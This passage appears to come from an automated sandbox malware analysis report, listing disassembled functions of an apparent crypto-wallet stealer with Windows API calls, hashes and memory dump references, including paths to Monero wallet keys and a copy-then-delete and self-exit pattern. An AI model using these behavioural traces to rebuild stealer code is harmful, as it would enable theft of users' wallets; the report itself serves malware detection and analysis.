                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: 3aae57fbe10cc9500df1d8f4e277a200da2ebc31c101296b2a97ad3b9fdebca8
                                • Instruction ID: d765e06f168122d785b243e5752e71b4c0ab4fa9ff5cee0722ec4f94baa57c60
                                • Opcode Fuzzy Hash: 3aae57fbe10cc9500df1d8f4e277a200da2ebc31c101296b2a97ad3b9fdebca8
                                • Instruction Fuzzy Hash: 9E010C75600208FFCB05DFECC994EAE7BB9FB48350F508548F9498B245CA75AA40DBA0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DC12B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DC12BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00DC12D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00DC12F5
                                • RegCloseKey.ADVAPI32(?), ref: 00DC12FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 778f2732287a6427c6e6ad245d6d9c2f981cd6c6e06f9564550a4f1c529d8535
                                • Instruction ID: bdaf3f7a3fa1ef3fbbae3a31e747ef132d7e233e62a4eccf5096e31885beef23
                                • Opcode Fuzzy Hash: 778f2732287a6427c6e6ad245d6d9c2f981cd6c6e06f9564550a4f1c529d8535
                                • Instruction Fuzzy Hash: 4F011DB9A40308FBDB10DFE0DC49FAEB7B8EB48701F008159FA4597284D6759A018B60
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: 3fc13e0bc9a6f6837dd27611b8f3d09f787208c37b9f41f9e7af8794a60dafc3
                                • Instruction ID: f35ce223a84c9c17c3de6304a925c9906a218e2154c2690dd4885a95ef92dd45
                                • Opcode Fuzzy Hash: 3fc13e0bc9a6f6837dd27611b8f3d09f787208c37b9f41f9e7af8794a60dafc3
                                • Instruction Fuzzy Hash: 7B4136B111079D5EDB218B24CD94FFBBBE89F05305F1854EAE9CA86282E2719A44DF30
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00DD6663
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00DD6726
                                • ExitProcess.KERNEL32 ref: 00DD6755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: 8af8667c5026cfd545557300969e80697d56db9ae25a2a433c3482a6d24d0910
                                • Instruction ID: 04fa4eb38ab3469246928e4e17e2ec76d1beb973233c9c386643f4a6285aafc6
                                • Opcode Fuzzy Hash: 8af8667c5026cfd545557300969e80697d56db9ae25a2a433c3482a6d24d0910
                                • Instruction Fuzzy Hash: C6312BB1901218ABDB15EB94DC92BDEB778EF44300F40919AF20A67281DF756B48CF79
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00DE0E28,00000000,?), ref: 00DD882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD8836
                                • wsprintfA.USER32 ref: 00DD8850
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 1bbeec9c7b1a786bf1e0011f6dd77e8b62a27495ca88f6b0c218973c2a469e29
                                • Instruction ID: 5553e75a9dcbe9613286b2345c006d6c7bc0a1f68829feeec8445a0981e660f5
                                • Opcode Fuzzy Hash: 1bbeec9c7b1a786bf1e0011f6dd77e8b62a27495ca88f6b0c218973c2a469e29
                                • Instruction Fuzzy Hash: F2212EB1A40308EFDB15DF94DD45FAEBBB8FB48711F104119F645A7284C77A99008BA0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00DD951E,00000000), ref: 00DD8D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD8D62
                                • wsprintfW.USER32 ref: 00DD8D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: 6a90792e348771b2dd14e2b9b18b676ae20d751dcb2ffbd20ecae49056ec33ff
                                • Instruction ID: 63a888d6fa3e34690dfcc6dbb6865977319fb5ea3857b0e232cd234a82ab5e1e
                                • Opcode Fuzzy Hash: 6a90792e348771b2dd14e2b9b18b676ae20d751dcb2ffbd20ecae49056ec33ff
                                • Instruction Fuzzy Hash: 09E08670B40308FFC710DB94DC09E5977B8EB04701F004054FD4987240D9765E008B61
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DD8B60: GetSystemTime.KERNEL32(00DE0E1A,0162A7E0,00DE05AE,?,?,00DC13F9,?,0000001A,00DE0E1A,00000000,?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DD8B86
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DCA2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 00DCA3FF
                                • lstrlen.KERNEL32(00000000), ref: 00DCA6BC
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 00DCA743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: d0586a93a54239fa6f76a5fa6d67a3631d3f5f569d44910065fc96e067cd8345
                                • Instruction ID: 8bf15bb89c8db18739d89466b2eb8d91194328bf895d5c6bf3bcc741605d6ce9
                                • Opcode Fuzzy Hash: d0586a93a54239fa6f76a5fa6d67a3631d3f5f569d44910065fc96e067cd8345
                                • Instruction Fuzzy Hash: 82E10B729101589ACB15FBA8DC92EEE733CEF18300F50C16AF516B2191EF346A49DB76
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DD8B60: GetSystemTime.KERNEL32(00DE0E1A,0162A7E0,00DE05AE,?,?,00DC13F9,?,0000001A,00DE0E1A,00000000,?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DD8B86
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DCD481
                                • lstrlen.KERNEL32(00000000), ref: 00DCD698
                                • lstrlen.KERNEL32(00000000), ref: 00DCD6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 00DCD72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: b9589106ff7358e90636040ab70d5f0e7975e928e6c9f706c95696fd3047722d
                                • Instruction ID: 71de8653ebdf158281472a1bf9d0fd4dd78c4478010da21ddf391e10647eb2d5
                                • Opcode Fuzzy Hash: b9589106ff7358e90636040ab70d5f0e7975e928e6c9f706c95696fd3047722d
                                • Instruction Fuzzy Hash: EE912C729101589BCB15FBA8DC92EEE7338EF54300F50816AF507A7291EF346A09DB76
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DD8B60: GetSystemTime.KERNEL32(00DE0E1A,0162A7E0,00DE05AE,?,?,00DC13F9,?,0000001A,00DE0E1A,00000000,?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DD8B86
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DCD801
                                • lstrlen.KERNEL32(00000000), ref: 00DCD99F
                                • lstrlen.KERNEL32(00000000), ref: 00DCD9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 00DCDA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 60b6278ed58fcfc2d0161e409def166ed3283d770dd7996206a565d95a50aca5
                                • Instruction ID: f6765c1cce95fe054d884d45c8a16b511423801c355ee7c5e536e9282b2939a3
                                • Opcode Fuzzy Hash: 60b6278ed58fcfc2d0161e409def166ed3283d770dd7996206a565d95a50aca5
                                • Instruction Fuzzy Hash: 448110729101589BCB15FBA8DC96EEE7338EF54300F50812AF407A7291EF746A09DB76
                                APIs
                                  • Part of subcall function 00DDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DDA7E6
                                  • Part of subcall function 00DC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DC99EC
                                  • Part of subcall function 00DC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DC9A11
                                  • Part of subcall function 00DC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DC9A31
                                  • Part of subcall function 00DC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DC148F,00000000), ref: 00DC9A5A
                                  • Part of subcall function 00DC99C0: LocalFree.KERNEL32(00DC148F), ref: 00DC9A90
                                  • Part of subcall function 00DC99C0: CloseHandle.KERNEL32(000000FF), ref: 00DC9A9A
                                  • Part of subcall function 00DD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DD8E52
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                  • Part of subcall function 00DDA920: lstrcpy.KERNEL32(00000000,?), ref: 00DDA972
                                  • Part of subcall function 00DDA920: lstrcat.KERNEL32(00000000), ref: 00DDA982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00DE1580,00DE0D92), ref: 00DCF54C
                                • lstrlen.KERNEL32(00000000), ref: 00DCF56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
